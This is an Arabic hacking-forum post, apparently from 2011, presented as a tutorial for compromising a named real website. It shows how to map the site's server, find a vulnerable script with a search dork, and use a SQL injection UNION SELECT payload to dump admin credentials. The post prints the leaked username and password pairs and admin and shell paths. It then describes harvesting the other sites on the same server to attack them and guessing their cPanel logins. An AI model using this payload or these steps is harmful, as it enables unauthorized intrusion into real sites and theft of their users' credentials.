عرض مشاركة واحدة
قديم 11-13-2011, 02:47 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
b10001
 
الصورة الرمزية b10001
 

 

 
إحصائية العضو







b10001 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
b10001 is on a distinguished road

.................... حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوزرات و التخمين علي السي بانل




الدرس الاول استهداف الموقع و استخراج السيرفر

كود PHP:
http://mckitchens.com/ 
الموقع المستهدف نستخرج السيرفر من عدة مواقع منها
كود PHP:
www.whois.net/
www.raynette.fr/services/whois/
whois.domaintools.com
www.whois.sc
نستعمل موقع هذا احسن لنخرج السيرفر

كود PHP:
news.netcraft.com
نكتب الموقع علي الشكل التالي

كود PHP:
mckitchens.com 
ثم نظغط علي raport

السيرفر هو

كود PHP:
IP address    209.234.251.93    Site rank    201
Country     US    Nameserver    ns1
.drudgereport.com
Date first seen    April 1997    DNS admin    __hostmaster
@drudgereport.com
Domain Registrar    networksolutions
.com    Reverse DNS    unknown
Organisation    Drudge
MattPO Box 459ATTN DRUDGEREPORT.COMcare of Network SolutionsDrumsPanama    Nameserver Organisation    DrudgeMattPO Box 459ATTN DRUDGEREPORT.COMcare of Network SolutionsDrumsPanama 
كود PHP:
 209.234.251.93 

الدرس الثاني اكتشاف الثغرات في الموقع

اول شي نروح لل

كود PHP:
Bing.com 
نكتب كما موجود للبحث عن الثغرات مع اني كنت اتصفح فلموقع فلقيت سكريبت

كود PHP:
panorama-viewer.php?id
يعني سنبحث عن ثغرات SQL injection

نكتب شبه دورك

كود PHP:
inurl:"panorama-viewer.php?id=" 
سنجد كثير مواقع منها موقعنا اي يعني انه مصاب اوكي عملنا كل شي الا الاستغلال

روح لموقع ثغرات نكتب

كود PHP:
exploit-db.com 
كود PHP:
chercher inurl:"panorama-viewer.php?id=" 
يعني طلعتلنا الثغرة


الدرس الثالث اختراق الموقع

اوكي الدورك هنا

كود PHP:
Google searchinurl:panorama-viewer.php?id
الاستغلال

كود PHP:
http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--


[-] http://server/adm/users.php

[-] http://server/adm/panorama_edit.php?id=1

[-] http://server/listimages/shell.php 
الموقع المستهدف

كود PHP:
http://mckitchens.com/panorama-viewer.php?id=1 
تم الاختراق

كود PHP:
http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users-- 
معلومات الادمين

كود PHP:
JOHNZ3CABN:MCKMIS89A3F,GINNYUZ3R:*P255W0RD407 

الدرس الرابع استخراج مواقع السيرفر
كود PHP:
http://www.yougetsignal.com/tools/web-sites-on-web-server/ 
الموقع يخرج مواقع السيرفر و انت طبق عليهم الثفرة
ثم نفتح الnotepad

نضع المواقع و نحذف منها com net org etc

نسجل الملف تيكست نصي ونفتحه بالmicrosoft accés

نضع الموشر في الثمانين

مبروك عليك اليوزرات ثم خمن علي السي بانل

تحياتي لكم يا عناكب





pwvdh : hsji]ht l,ru , h;jaht eyvhj el hsjovh[ hgsdvtv hgl,hru hgjhfum hsji]htih hgd,.vhj

التوقيع

http://img198.imageshack.us/img198/1722/sansredrh.jpg

http://im16.gulfup.com/2011-10-15/131870922211.gif
[SIZE="7"][COLOR="Lime"]

 

   

رد مع اقتباس